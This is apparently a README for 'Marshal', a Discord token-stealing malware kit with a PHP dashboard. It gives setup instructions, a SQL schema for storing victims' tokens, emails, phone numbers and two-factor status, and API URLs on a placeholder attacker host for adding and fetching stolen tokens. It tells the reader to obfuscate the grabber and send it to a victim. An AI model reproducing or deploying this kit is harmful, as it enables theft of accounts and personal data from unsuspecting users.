The Best Most powerfull token grabber with dashboard.
- All in Interface
- Can't delete webhook
- Custom API for fetch/remove/add tokens
- Login system with secret password
- Grabber on 22 Applications/browsers
- Very Simple Usage
For use Marshal, you need a Server accept PHP and contain a database,
- Put the files in your host
- Go to your phpmyadmin, in section SQL paste that:
CREATE TABLE `tokens` ( `user_id` text NOT NULL, `username` text NOT NULL, `avatar` text NOT NULL, `email` text NOT NULL, `phone` text NOT NULL, `badges` text NOT NULL, `nitro_badges` text NOT NULL, `twofactor` text NOT NULL, `token` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
- Make your database ip,databse name,username,password in the file
Inc/database.php
- Setup your passwords and webhooks in
INC/functions.php
- Make your host adress in
Grabber/python/marshal.py
at line 5- Compile and obfuscated your Grabber and send it to your victime :)
- Put a stars and follow me for more :)
- Add Discord Token To Database
https://yourhost.com/api?type=addtoken&token=THE_VICTIME_TOKEN
- Remove Discord Token From Database
https://yourhost.com/api?type=removetoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN
- Fetch Discord Token Info From Database
https://yourhost.com/api?type=fetchtoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN